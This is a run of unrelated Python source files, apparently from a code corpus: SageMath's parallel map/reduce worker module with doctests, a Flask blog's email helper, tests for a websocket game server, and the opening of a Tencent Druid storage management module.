this returns ``a`` itself.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.post_process(4)
4
sage: S = RESetMapReduce(post_process=lambda x: x*x)
sage: S.post_process(4)
16
"""
return a
_reduce_init = 0
def reduce_init(self):
r"""
Return the initial element for a reduction.
.. note:: This should be overloaded in applications.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_init()
0
sage: S = RESetMapReduce(reduce_init = 2)
sage: S.reduce_init()
2
"""
return copy.copy(self._reduce_init)
def setup_workers(self, max_proc=None, reduce_locally=True):
r"""
Setup the communication channels.
INPUT:
- ``max_proc`` -- (integer) an upper bound on the number of
worker processes.
- ``reduce_locally`` -- whether the workers should reduce locally
their work or sends results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: S._results
<multiprocessing.queues.Queue object at 0x...>
sage: len(S._workers)
2
"""
self._nprocess = proc_number(max_proc)
self._results = mp.Queue()
self._active_tasks = ActiveTaskCounter(self._nprocess)
self._done = mp.Lock()
# We use lock=False here, as a compromise, to avoid deadlocking when a
# subprocess holding a lock is terminated. (:trac:`33236`)
self._aborted = mp.Value(ctypes.c_bool, False, lock=False)
sys.stdout.flush()
sys.stderr.flush()
self._workers = [RESetMapReduceWorker(self, i, reduce_locally)
for i in range(self._nprocess)]
def start_workers(self):
r"""
Launch the workers.
The workers should have been created using :meth:`setup_workers`.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: def children(x):
....: print(f"Starting: {x}", flush=True)
....: sleep(float(0.5))
....: print(f"Finished: {x}", flush=True)
....: return []
sage: S = RESetMapReduce(roots=[1, 2], children=children)
sage: S.setup_workers(2)
sage: S.start_workers(); sleep(float(0.4))
Starting: ...
Starting: ...
sage: [w.is_alive() for w in S._workers]
[True, True]
sage: sleep(float(1.5))
Finished: ...
Finished: ...
sage: [not w.is_alive() for w in S._workers]
[True, True]
Cleanup::
sage: S.finish()
"""
if self._nprocess == 0:
raise ValueError("No process connected")
logger.info("Starting work with %s processes", self._nprocess)
logger.debug("Distributing tasks")
for i, task in enumerate(self.roots()):
self._workers[i % len(self._workers)]._todo.append(task)
logger.debug("Starting processes")
sys.stdout.flush()
sys.stderr.flush()
for w in self._workers:
w.start()
def get_results(self, timeout=None):
r"""
Get the results from the queue.
OUTPUT:
The reduction of the results of all the workers, that is, the result of
the map/reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: for v in [1, 2, None, 3, None]: S._results.put(v)
sage: S.get_results()
6
Cleanup::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
res = self.reduce_init()
active_proc = self._nprocess
while active_proc > 0:
try:
logger.debug('Waiting on results; active_proc: %s, '
'timeout: %s, aborted: %s' %
(active_proc, timeout, self._aborted.value))
newres = self._results.get(timeout=timeout)
except queue.Empty:
logger.debug('Timed out waiting for results; aborting')
# If we timed out here then the abort timer should have
# already fired, but just in case it didn't (or is in
# progress) wait for it to finish
self._timer.join()
return
if newres is not None:
logger.debug("Got one result")
res = self.reduce_function(res, newres)
else:
active_proc -= 1
return res
def finish(self):
r"""
Destroy the workers and all the communication objects.
Communication statistics are gathered before destroying the workers.
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=5)
sage: S.setup_workers(2) # indirect doctest
sage: S._workers[0]._todo.append([])
sage: for w in S._workers: w.start()
sage: _ = S.get_results()
sage: S._shutdown()
sage: S.print_communication_statistics()
Traceback (most recent call last):
...
AttributeError: 'RESetMPExample' object has no attribute '_stats'
sage: S.finish()
sage: S.print_communication_statistics()
#proc: ...
...
sage: _ = S.run() # cleanup
.. SEEALSO:: :meth:`print_communication_statistics`
"""
if not self._aborted.value:
logger.debug("Joining worker processes...")
for worker in self._workers:
logger.debug("Joining %s" % worker.name)
worker.join()
logger.debug("Joining done")
else:
logger.debug("Killing worker processes...")
for worker in self._workers:
logger.debug("Terminating %s" % worker.name)
worker.terminate()
logger.debug("Killing done")
del self._results, self._active_tasks, self._done
self._get_stats()
del self._workers
def abort(self):
r"""
Abort the current parallel computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator([[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 17 else [])
sage: it = iter(S)
sage: next(it) # random
[]
sage: S.abort()
sage: hasattr(S, 'work_queue')
False
Cleanup::
sage: S.finish()
"""
logger.info("Abort called")
self._aborted.value = True
self._active_tasks.abort()
self._shutdown()
def _shutdown(self):
r"""
Shutdown the workers.
Sends a poison pill to all workers and their thief thread.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: for w in S._workers: w.start()
sage: S._shutdown()
Cleanup::
sage: S.finish()
"""
if self._done.acquire(False):
logger.debug("***************** FINISHED ******************")
logger.debug("Sending poison pills")
for worker in self._workers:
worker._request.put(AbortError)
for worker in self._workers:
worker._write_task.send(AbortError)
def _signal_task_start(self):
r"""
Signal a starting task.
Used by the worker to signal that a new task is starting. As soon as
there are no more active task, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_start()
sage: S._active_tasks
ActiveTaskCounter(value=3)
Signaling one time too many raises an :exc:`AbortError`::
sage: S._signal_task_done()
sage: S._signal_task_done()
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
"""
if self._active_tasks.task_start() == 0:
raise AbortError
def _signal_task_done(self):
r"""
Signal a task is done.
Used by the worker to signal that a task is done. As soon as
there are no more active task, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator(
....: [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_done()
sage: S._active_tasks
ActiveTaskCounter(value=1)
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
Cleanup::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
# We test if the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially put the
# semaphore to 0 to stop the computation so that it is needed.
if self._active_tasks.task_done() <= 0:
logger.debug("raising AbortError")
self._shutdown()
raise AbortError
def random_worker(self):
r"""
Return a random worker.
OUTPUT:
A worker for ``self`` chosen at random.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: EX.random_worker()
<RESetMapReduceWorker...RESetMapReduceWorker-... initial...>
sage: EX.random_worker() in EX._workers
True
Cleanup::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
victim = random.randint(0, len(self._workers) - 1)
return self._workers[victim]
def run(self,
max_proc=None,
reduce_locally=True,
timeout=None,
profile=None):
r"""
Run the computations.
INPUT:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``reduce_locally`` -- See :class:`RESetMapReduceWorker` (default: ``True``)
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``profile`` -- directory/filename prefix for profiling, or ``None``
for no profiling (default: ``None``)
OUTPUT:
The result of the map/reduce computation or an exception
:exc:`AbortError` if the computation was interrupted or timeout.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 8)
sage: EX.run()
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Here is an example or how to deal with timeout::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 100)
sage: try:
....: res = EX.run(timeout=float(0.01))
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
self._profile = profile
self.setup_workers(max_proc, reduce_locally)
self.start_workers()
if timeout is not None:
from threading import Timer
self._timer = Timer(timeout, self.abort)
self._timer.start()
self.result = self.get_results(timeout=timeout)
if timeout is not None:
self._timer.cancel()
logger.info("Returning")
self.finish()
if self._aborted.value:
raise AbortError
else:
return self.result
def _get_stats(self):
r"""
Gather the communication statistics at the end of a run.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run() # indirect doctest
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
res = []
for i in range(self._nprocess):
res.append(tuple(self._workers[i]._stats))
self._stats = res
def print_communication_statistics(self, blocksize=16):
r"""
Print the communication statistics in a nice way.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
sage: S.print_communication_statistics() # random
#proc: 0 1 2 3 4 5 6 7
reqs sent: 5 2 3 11 21 19 1 0
reqs rcvs: 10 10 9 5 1 11 9 2
- thefs: 1 0 0 0 0 0 0 0
+ thefs: 0 0 1 0 0 0 0 0
"""
res = [""] # classic trick to have a local variable shared with the
# local function (see e.g:
# https://stackoverflow.com/questions/2609518/python-nested-function-scopes).
def pstat(name, start, end, ist):
res[0] += ("\n" + name + " ".join(
"%4i" % (self._stats[i][ist]) for i in range(start, end)))
for start in range(0, self._nprocess, blocksize):
end = min(start + blocksize, self._nprocess)
res[0] = ("#proc: " +
" ".join("%4i" % (i) for i in range(start, end)))
pstat("reqs sent: ", start, end, 0)
pstat("reqs rcvs: ", start, end, 1)
pstat("- thefs: ", start, end, 2)
pstat("+ thefs: ", start, end, 3)
print(res[0])
def run_serial(self):
r"""
Run the computation serially (mostly for tests).
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 4)
sage: EX.run_serial()
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
import functools
return functools.reduce(self.reduce_function,
(self.map_function(x) for x in self._forest),
self.reduce_init())
class RESetMapReduceWorker(mp.Process):
"""
Worker for generate-map-reduce.
This shouldn't be called directly, but instead created by
:meth:`RESetMapReduce.setup_workers`.
INPUT:
- ``mapred`` -- the instance of :class:`RESetMapReduce` for which
this process is working.
- ``iproc`` -- the id of this worker.
- ``reduce_locally`` -- when reducing the results. Three possible values
are supported:
* ``True`` -- means the reducing work is done all locally, the result is
only sent back at the end of the work. This ensure the lowest level of
communication.
* ``False`` -- results are sent back after each finished branches, when
the process is asking for more work.
"""
def __init__(self, mapred, iproc, reduce_locally):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample()
sage: RESetMapReduceWorker(EX, 200, True)
<RESetMapReduceWorker...RESetMapReduceWorker-... initial...>
"""
mp.Process.__init__(self)
self._iproc = iproc
self._todo = deque()
self._request = mp.SimpleQueue() # Faster than Queue
# currently this is not possible to have to simultaneous read or write
# on the following Pipe. So there is no need to have a queue.
self._read_task, self._write_task = mp.Pipe(duplex=False)
self._mapred = mapred
self._stats = mp.RawArray('i', 4)
self._reduce_locally = reduce_locally
def _thief(self):
r"""
Return the thief thread of this worker process.
"""
logger.debug("Thief started")
reqs = 0
thefts = 0
try:
for ireq in iter(self._request.get, AbortError):
reqs += 1
target = self._mapred._workers[ireq]
logger.debug("Got a Steal request from %s" % target.name)
self._mapred._signal_task_start()
try:
work = self._todo.popleft()
except IndexError:
target._write_task.send(None)
logger.debug("Failed Steal %s" % target.name)
self._mapred._signal_task_done()
else:
target._write_task.send(work)
logger.debug("Succesful Steal %s" % target.name)
thefts += 1
except AbortError:
logger.debug("Thief aborted")
else:
logger.debug("Thief received poison pill")
if self._mapred._aborted.value: # Computation was aborted
self._todo.clear()
else: # Check that there is no remaining work
assert len(self._todo) == 0, "Bad stop the result may be wrong"
self._stats[1] = reqs
self._stats[2] = thefts
logger.debug("Thief Exiting")
def steal(self):
r"""
Steal some node from another worker.
OUTPUT:
A node stolen from another worker chosen at random.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: w0, w1 = EX._workers
sage: w0._todo.append(42)
sage: thief0 = Thread(target = w0._thief, name="Thief")
sage: thief0.start() # known bug (Trac #27537)
sage: w1.steal() # known bug (Trac #27537)
42
sage: w0._todo # known bug (Trac #27537)
deque([])
"""
self._mapred._signal_task_done()
node = None
while node is None:
victim = self._mapred.random_worker()
if victim is not self:
logger.debug("Trying to steal from %s" % victim.name)
victim._request.put(self._iproc)
self._stats[0] += 1
logger.debug("waiting for steal answer from %s" % victim.name)
node = self._read_task.recv()
# logger.debug("Request answer: %s" % (node,))
if node is AbortError:
raise AbortError
# logger.debug("Received a stolen node: %s" % (node,))
self._stats[3] += 1
return node
def run(self):
r"""
The main function executed by the worker.
Calls :meth:`run_myself` after possibly setting up parallel profiling.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run()
sage: sleep(int(1))
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
profile = self._mapred._profile
if profile is not None:
import cProfile
PROFILER = cProfile.Profile()
PROFILER.runcall(self.run_myself)
output = profile + str(self._iproc)
logger.warn("Profiling in %s ..." % output)
PROFILER.dump_stats(output)
else:
self.run_myself()
def run_myself(self):
r"""
The main function executed by the worker.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run_myself()
sage: sleep(int(1))
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
logger.debug("Started")
mapred = self._mapred
reduce_init = mapred.reduce_init
results = mapred._results
self._stats[0] = 0
self._stats[3] = 0
logger.debug("Launching thief")
self._thief = Thread(target=self._thief, name="Thief")
self._thief.start()
self._res = reduce_init()
try:
while True:
try:
node = self._todo.pop()
except IndexError:
node = self.steal()
self.walk_branch_locally(node)
if not self._reduce_locally:
self.send_partial_result()
except AbortError:
logger.debug("Worker Done !")
results.put(self._res)
results.put(None)
self._thief.join()
del self._request
self._read_task.close()
self._write_task.close()
del self._read_task, self._write_task
del self._mapred
del self._stats
logger.debug("Exiting")
def send_partial_result(self):
r"""
Send results to the MapReduce process.
Send the result stored in ``self._res`` to the master an reinitialize it to
``master.reduce_init``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._res = 4
sage: w.send_partial_result()
sage: w._res
0
sage: EX._results.get()
4
"""
self._mapred._results.put(self._res)
self._res = self._mapred.reduce_init()
def walk_branch_locally(self, node):
r"""
Work locally.
Performs the map/reduce computation on the subtrees rooted at ``node``.
INPUT:
- ``node`` -- the root of the subtree explored.
OUTPUT:
Nothing, the result are stored in ``self._res``.
This is where the actual work is performed.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=4)
sage: w = RESetMapReduceWorker(EX, 0, True)
sage: def sync(): pass
sage: w.synchronize = sync
sage: w._res = 0
sage: w.walk_branch_locally([])
sage: w._res
x^4 + x^3 + x^2 + x + 1
sage: w.walk_branch_locally(w._todo.pop())
sage: w._res
2*x^4 + x^3 + x^2 + x + 1
sage: while True: w.walk_branch_locally(w._todo.pop())
Traceback (most recent call last):
...
IndexError: pop from an empty deque
sage: w._res
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
mapred = self._mapred
children = mapred.children
post_process = mapred.post_process
fun = mapred.map_function
reduc = mapred.reduce_function
# logger.debug("Working on %s..." % (node,))
while True:
res = post_process(node)
if res is not None:
self._res = reduc(self._res, fun(res))
newnodes = iter(children(node))
try:
node = next(newnodes)
except StopIteration:
return
self._todo.extend(newnodes)
class RESetMPExample(RESetMapReduce):
r"""
An example of map reduce class.
INPUT:
- ``maxl`` -- the maximum size of permutations generated (default to `9`).
This computes the generating series of permutations counted by their size
up to size ``maxl``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: EX.run()
362880*x^9 + 40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5
+ 24*x^4 + 6*x^3 + 2*x^2 + x + 1
.. SEEALSO:: This is an example of :class:`RESetMapReduce`
"""
def __init__(self, maxl=9):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample()
<sage.parallel.map_reduce.RESetMPExample object at 0x...>
"""
RESetMapReduce.__init__(self)
from sage.rings.polynomial.polynomial_ring import polygen
from sage.rings.integer_ring import ZZ
self.x = polygen(ZZ, 'x')
self.maxl = maxl
def roots(self):
r"""
Return the empty permutation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().roots()
[[]]
"""
return [[]]
def children(self, l):
r"""
Return the children of the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
The lists with ``len(l)`` inserted at all possible positions into ``l``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().children([1,0])
[[2, 1, 0], [1, 2, 0], [1, 0, 2]]
"""
return [l[:i] + [len(l)] + l[i:]
for i in range(len(l) + 1)] if len(l) < self.maxl else []
def map_function(self, l):
r"""
The monomial associated to the permutation `l`.
INPUT:
- ``l`` -- a list containing a permutation
OUTPUT:
The monomial ``x^len(l)``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: RESetMPExample().map_function([1,0])
x^2
"""
return self.x**len(l)
class RESetParallelIterator(RESetMapReduce):
r"""
A parallel iterator for recursively enumerated sets.
This demonstrates how to use :class:`RESetMapReduce` to get an iterator on
a recursively enumerated set for which the computations are done in
parallel.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator([[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: sum(1 for _ in S)
65535
"""
def map_function(self, z):
r"""
Return a singleton tuple.
INPUT:
- ``z`` -- a node
OUTPUT:
The singleton ``(z, )``.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: S.map_function([1, 0])
([1, 0],)
"""
return (z,)
reduce_init = tuple
def __iter__(self):
r"""
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 15 else [])
sage: it = iter(S)
sage: next(it) # random
[1, 1, 0]
sage: next(it) # random
[1, 1, 0, 1]
sage: sum(1 for _ in it)
65533
"""
self.setup_workers(reduce_locally=False)
self.start_workers()
active_proc = self._nprocess
while True:
newres = self._results.get()
if newres is not None:
logger.debug("Got some results")
for r in newres:
yield r
else:
active_proc -= 1
if active_proc == 0:
break
self.finish()
|
emails.py
|
from threading import Thread
from flask import url_for, current_app
from flask_mail import Message
from bluelog.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(subject, to, html):
app = current_app._get_current_object()
message = Message(subject, recipients=[to], html=html)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_new_comment_email(post):
post_url = url_for('blog.show_post', post_id=post.id, _external=True) + '#comments'
send_mail(subject='新评论', to=current_app.config['BLUELOG_EMAIL'],
html='<p>新的评论在文章 <i>%s</i>, 点击下面的链接查看:</p>'
'<p><a href="%s">%s</a></P>'
'<p><small style="color: #868e96">不要回复此邮件.</small></p>'
% (post.title, post_url, post_url))
def send_new_reply_email(comment):
post_url = url_for('blog.show_post', post_id=comment.post_id, _external=True) + '#comments'
send_mail(subject='新回复', to=comment.email,
html='<p>回复你留下的评论在文章 <i>%s</i>, 点击下面的链接查看: </p>'
'<p><a href="%s">%s</a></p>'
'<p><small style="color: #868e96">不要回复此邮件.</small></p>'
% (comment.post.title, post_url, post_url))
|
test_server.py
|
from unittest import TestCase
import asyncio
import websockets
import threading as th
import time
from server.server import Server
from server import event as e
class TestServer(TestCase):
def test_server_can_be_instantiated(self):
Server()
def test_msg_handlers_are_annotated_and_found_correctly(self):
server = Server()
self.assertEqual(server.handlers[e.TestMsg], server.handle_test_msg)
def test_server_can_register_connection(self):
server = Server()
connection_msg = e.ConnectRequestMsg('test_name')
uri = 'ws://localhost:8765'
server_thread = th.Thread(
target=lambda: server.start('localhost', 8765),
daemon=True)
try:
server_thread.start()
time.sleep(0.01) # give server thread a little time to start
send_test_msg(connection_msg, uri)
self.assertEqual(1, len(server.connections))
finally:
server.end()
server_thread.join()
def test_server_will_reject_repeated_socket_registrations(self):
"""
Server should ignore second and later ConnectRequestMsg sent
by a connected socket.
"""
server = Server()
connection_msg_a = e.ConnectRequestMsg('test_name')
connection_msg_b = e.ConnectRequestMsg('test_name')
uri = 'ws://localhost:8765'
server_thread = th.Thread(
target=lambda: server.start('localhost', 8765),
daemon=True)
try:
server_thread.start()
time.sleep(0.01) # give server thread a little time to start
async def test_send_duplicates():
async with websockets.connect(uri) as web_socket:
await web_socket.send(e.encode_msg(connection_msg_a))
await web_socket.send(e.encode_msg(connection_msg_b))
asyncio.get_event_loop().run_until_complete(test_send_duplicates())
self.assertEqual(1, len(server.connections))
finally:
server.end()
server_thread.join()
def send_test_msg(msg: e.GameMsg, uri):
"""
Sends passed message to passed uri.
Intended to be used for testing effect of sending a message
to a server.
:param msg: GameMsg
:param uri: uri str
:return: None
"""
async def test_send_():
async with websockets.connect(uri) as web_socket:
await web_socket.send(e.encode_msg(msg))
asyncio.get_event_loop().run_until_complete(test_send_())
|
druid.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import json
import random
import threading
import time
import uuid
from datetime import datetime, timedelta
import requests
from common.http import get, post
from common.log import logger
from datahub.common.const import (
APPEND_FIELDS,
BAD_FIELDS,
BIGINT,
CHECK_DIFF,
CHECK_RESULT,
CLUSTER_NAME,
CONNECTION_INFO,
COUNT,
DATASOURCE,
DRUID,
EXPIRES,
FAILED,
FIELD_NAME,
FIELD_TYPE,
FIELDS,
HOST,
ID,
INFO,
INTERVAL,
JSON_HEADERS,
LOCATION,
LONG,
MESSAGE,
MINTIME,
NAME,
PENDING,
PERIOD,
PHYSICAL_TABLE_NAME,
PORT,
REPORT_TIME,
RESULT_TABLE_ID,
RT_FIELDS,
RUNNING,
SAMPLE,
SEGMENTS,
SIZE,
STATUS,
STORAGE_CLUSTER,
STORAGE_CONFIG,
STORAGES,
STRING,
SUCCESS,
TABLE,
TABLE_RECORD_NUMS,
TABLE_SIZE_MB,
TASK,
TASK_TYPE,
TIMESTAMP,
TYPE,
UNKNOWN,
VARCHAR,
VERSION,
WAITING,
ZOOKEEPER_CONNECT,
)
from datahub.storekit import model_manager
from datahub.storekit.exceptions import (
DruidCreateTaskErrorException,
DruidDeleteDataException,
DruidHttpRequestException,
DruidQueryDataSourceException,
DruidQueryExpiresException,
DruidQueryHistoricalException,
DruidQueryTaskErrorException,
DruidQueryWorkersException,
DruidShutDownTaskException,
DruidUpdateExpiresException,
DruidZkConfException,
DruidZKPathException,
NotSupportTaskTypeException,
)
from datahub.storekit.settings import (
CLEAN_DELTA_DAY,
COORDINATOR,
DEFAULT_DRUID_EXPIRES,
DEFAULT_EXPIRES_RULE,
DEFAULT_MAX_IDLE_TIME,
DEFAULT_SEGMENT_GRANULARITY,
DEFAULT_TASK_MEMORY,
DEFAULT_TIMESTAMP_COLUMN,
DEFAULT_WINDOW_PERIOD,
DRUID_CLEAN_DEEPSTORAGE_TASK_CONFIG_TEMPLATE,
DRUID_COMPACT_SEGMENTS_TASK_CONFIG_TEMPLATE,
DRUID_MAINTAIN_TIMEOUT,
DRUID_VERSION_V1,
DRUID_VERSION_V2,
ENDPOINT_DATASOURCE_RULE,
ENDPOINT_GET_ALL_DATASOURCES,
ENDPOINT_GET_DATASOURCES,
ENDPOINT_GET_PENDING_TASKS,
ENDPOINT_GET_RUNNING_TASKS,
ENDPOINT_GET_RUNNING_WORKERS,
ENDPOINT_HISTORICAL_SIZES,
ENDPOINT_PUSH_EVENTS,
ENDPOINT_RUN_TASK,
ENDPOINT_SHUTDOWN_TASK,
EXCEPT_FIELDS,
EXECUTE_TIMEOUT,
HTTP_REQUEST_TIMEOUT,
INT_MAX_VALUE,
MAINTAIN_DELTA_DAY,
MERGE_BYTES_LIMIT,
MERGE_DAYS_DEFAULT,
OVERLORD,
TASK_CONFIG_TEMPLATE,
TASK_TYPE_PENDING,
TASK_TYPE_RUNNING,
TIME_ZONE_DIFF,
UTC_BEGIN_TIME,
UTC_FORMAT,
ZK_DRUID_PATH,
)
from datahub.storekit.util import translate_expires_day
from django.template import Context, Template
from kazoo.client import KazooClient
def initialize(rt_info):
"""
初始化rt的druid存储
:param rt_info: rt的字段和配置信息
:return: 初始化操作结果
"""
return prepare(rt_info)
def info(rt_info):
"""
获取rt的druid存储相关信息
:param rt_info: rt的字段和配置信息
:return: rt的druid相关信息
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
coordinator = _get_role_leader(zk_addr, COORDINATOR, druid[STORAGE_CLUSTER][VERSION])
# 获取维度和指标信息
broker_host, broker_port = conn_info[HOST], conn_info[PORT]
schema_url = f"http://{broker_host}:{broker_port}/druid/v2/sql/"
schema_sql = (
'{"query": "SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE '
"TABLE_NAME = '%s'\"}" % physical_tn
)
ok, schema = post(schema_url, params=json.loads(schema_sql))
table_schema = {}
if ok and schema:
for e in schema:
table_schema[e["COLUMN_NAME"].lower()] = e["DATA_TYPE"].lower()
logger.info(f"physical_tn: {physical_tn}, schema_url: {schema_url}, schema: {table_schema}")
# 获取segments信息:curl -XGET http://{router_ip:port}/druid/coordinator/v1/datasources/{datasource}
segments_url = f"http://{coordinator}/druid/coordinator/v1/datasources/{physical_tn}"
ok, segments = get(segments_url)
logger.info(f"physical_tn: {physical_tn}, segments_url: {segments_url}, segments: {segments}")
# 获取样例数据
sample_url = f"http://{broker_host}:{broker_port}/druid/v2/sql/"
sample_sql = '{"query": "SELECT * FROM \\"%s\\" ORDER BY __time DESC LIMIT 10"}' % physical_tn
ok, sample = post(sample_url, params=json.loads(sample_sql))
logger.info(f"physical_tn: {physical_tn}, sample_url: {sample_url}, sample_sql: {sample_sql}, sample: {sample}")
druid[INFO] = {TABLE: table_schema, SEGMENTS: segments, SAMPLE: sample}
return druid
def get_task_status(overlord, task_id, druid_version):
"""
获取指定task_id的任务状态
:param druid_version: druid集群的版本
:param overlord: overlord角色leader,形式ip:port
